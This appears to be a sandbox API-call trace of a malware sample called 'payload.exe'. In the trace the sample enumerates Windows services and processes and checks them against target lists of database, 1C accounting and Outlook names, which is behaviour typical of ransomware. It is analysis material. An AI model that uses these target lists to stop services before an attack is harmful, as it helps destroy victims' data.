[0270.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0270.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0270.794] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0270.794] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0270.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0270.795] lstrlenW (lpString="PcaSvc") returned 6 [0270.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0270.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0270.795] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0270.795] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0270.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0270.795] lstrlenW (lpString="PlugPlay") returned 8 [0270.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0270.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0270.795] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0270.795] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0270.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0270.795] lstrlenW (lpString="Power") returned 5 [0270.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0270.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0270.795] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0270.795] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0270.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0270.795] lstrlenW (lpString="ProfSvc") returned 7 [0270.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0270.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0270.796] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0270.796] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0270.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0270.796] lstrlenW (lpString="RpcEptMapper") returned 12 [0270.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0270.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0270.796] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0270.796] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0270.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0270.796] lstrlenW (lpString="RpcSs") returned 5 [0270.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0270.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0270.796] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0270.796] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0270.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0270.796] lstrlenW (lpString="SamSs") returned 5 [0270.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0270.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0270.796] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0270.796] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0270.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0270.796] lstrlenW (lpString="Schedule") returned 8 [0270.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0270.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0270.796] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0270.796] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0270.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0270.796] lstrlenW (lpString="SENS") returned 4 [0270.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0270.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0270.797] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0270.797] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0270.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0270.797] lstrlenW (lpString="ShellHWDetection") returned 16 [0270.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0270.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0270.797] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0270.797] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0270.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0270.797] lstrlenW (lpString="Spooler") returned 7 [0270.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0270.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0270.797] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0270.797] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0270.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0270.797] lstrlenW (lpString="Themes") returned 6 [0270.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0270.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0270.797] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0270.797] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0270.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0270.797] lstrlenW (lpString="UxSms") returned 5 [0270.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0270.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0270.797] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0270.797] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0270.798] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0270.798] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0270.798] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x39c [0270.799] Process32FirstW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.799] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0270.799] lstrlenW (lpString="System") returned 6 [0270.799] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0270.799] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0270.799] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0270.799] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0270.800] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0270.800] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0270.800] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0270.800] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0270.800] lstrlenW (lpString="smss.exe") returned 8 [0270.800] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0270.800] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0270.800] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0270.800] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0270.800] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0270.800] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0270.800] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0270.800] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.800] lstrlenW (lpString="csrss.exe") returned 9 [0270.800] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0270.800] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0270.800] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0270.800] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0270.801] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0270.801] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0270.801] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0270.801] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0270.801] lstrlenW (lpString="wininit.exe") returned 11 [0270.801] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0270.801] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0270.801] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0270.801] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0270.801] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0270.801] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0270.801] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0270.801] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.801] lstrlenW (lpString="csrss.exe") returned 9 [0270.801] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0270.801] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0270.801] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0270.802] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0270.802] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0270.802] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0270.802] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0270.802] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0270.802] lstrlenW (lpString="winlogon.exe") returned 12 [0270.802] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0270.802] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0270.802] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0270.802] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0270.802] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0270.802] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0270.802] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0270.802] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0270.802] lstrlenW (lpString="services.exe") returned 12 [0270.802] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0270.802] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0270.802] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0270.803] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0270.803] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0270.803] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0270.803] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0270.803] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0270.803] lstrlenW (lpString="lsass.exe") returned 9 [0270.803] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0270.803] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0270.803] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0270.803] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0270.803] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0270.803] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0270.803] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0270.803] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0270.804] lstrlenW (lpString="lsm.exe") returned 7 [0270.804] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0270.804] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0270.804] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0270.804] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0270.804] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0270.804] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0270.804] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0270.804] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.804] lstrlenW (lpString="svchost.exe") returned 11 [0270.804] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.804] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.804] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.804] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.804] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.804] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.804] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.804] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.805] lstrlenW (lpString="svchost.exe") returned 11 [0270.805] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.805] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.805] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.805] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.805] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.805] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.805] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.805] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.805] lstrlenW (lpString="svchost.exe") returned 11 [0270.805] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.805] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.805] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.805] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.806] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.806] lstrlenW (lpString="svchost.exe") returned 11 [0270.806] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.806] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.806] lstrlenW (lpString="svchost.exe") returned 11 [0270.806] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.806] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.807] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0270.807] lstrlenW (lpString="audiodg.exe") returned 11 [0270.807] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.807] lstrlenW (lpString="svchost.exe") returned 11 [0270.807] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.807] lstrlenW (lpString="svchost.exe") returned 11 [0270.808] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0270.808] lstrlenW (lpString="userinit.exe") returned 12 [0270.808] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0270.808] lstrlenW (lpString="dwm.exe") returned 7 [0270.808] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0270.808] lstrlenW (lpString="explorer.exe") returned 12 [0270.808] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0270.809] lstrlenW (lpString="spoolsv.exe") returned 11 [0270.809] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0270.809] lstrlenW (lpString="taskhost.exe") returned 12 [0270.809] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.809] lstrlenW (lpString="svchost.exe") returned 11 [0270.809] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0270.810] lstrlenW (lpString="payload.exe") returned 11 [0270.810] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0270.810] lstrlenW (lpString="dllhost.exe") returned 11 [0270.810] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0270.810] lstrlenW (lpString="reader_sl.exe") returned 13 [0270.810] Process32NextW (in: hSnapshot=0x39c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0270.810] CloseHandle (hObject=0x39c) returned 1 [0270.810] Sleep (dwMilliseconds=0x1f4) [0271.420] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c09a8 [0271.430] EnumServicesStatusExW (in: hSCManager=0x43c09a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0271.430] GetLastError () returned 0xea [0271.430] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0271.430] EnumServicesStatusExW (in: hSCManager=0x43c09a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0271.430] CloseServiceHandle (hSCObject=0x43c09a8) returned 1 [0271.430] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0271.430] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0271.430] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0271.430] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0271.430] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0271.430] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0271.431] lstrlenW (lpString="AudioSrv") returned 8 [0271.431] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0271.431] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0271.431] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0271.431] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0271.431] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0271.431] lstrlenW (lpString="BFE") returned 3 [0271.431] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 